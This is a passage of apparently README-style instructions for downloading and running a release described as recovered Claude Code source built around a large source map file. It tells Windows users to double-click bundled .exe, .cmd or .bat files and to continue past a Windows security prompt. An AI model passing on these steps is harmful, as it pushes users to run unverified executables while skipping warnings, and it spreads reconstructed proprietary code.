🛠️ How to download

4. Save it to your Downloads folder or Desktop
5. Wait for the download to finish before you open it

💻 How to run on Windows

1. Open File Explorer
2. Go to the folder where you saved the download
3. If the file is a .zip, right-click it and choose Extract All
4. Open the extracted folder
5. If you see an .exe file, double-click it to start
6. If Windows shows a security prompt, choose the option to keep going if you trust the file source
7. If the release includes a .cmd or .bat file, double-click it to run the local setup

📦 File layout

A typical release may include these files:

• cli.js.map - large source map file

For the cleanest setup, keep the files in one place:

• C:\Users\YourName\Downloads\claude_code_src\
• or C:\Users\YourName\Desktop\claude_code_src\

Do not move only one file out of the folder if the app needs the rest of the release next to it

• Keep the file names as they were in the release

You can then browse the recovered source content and copy the parts you need
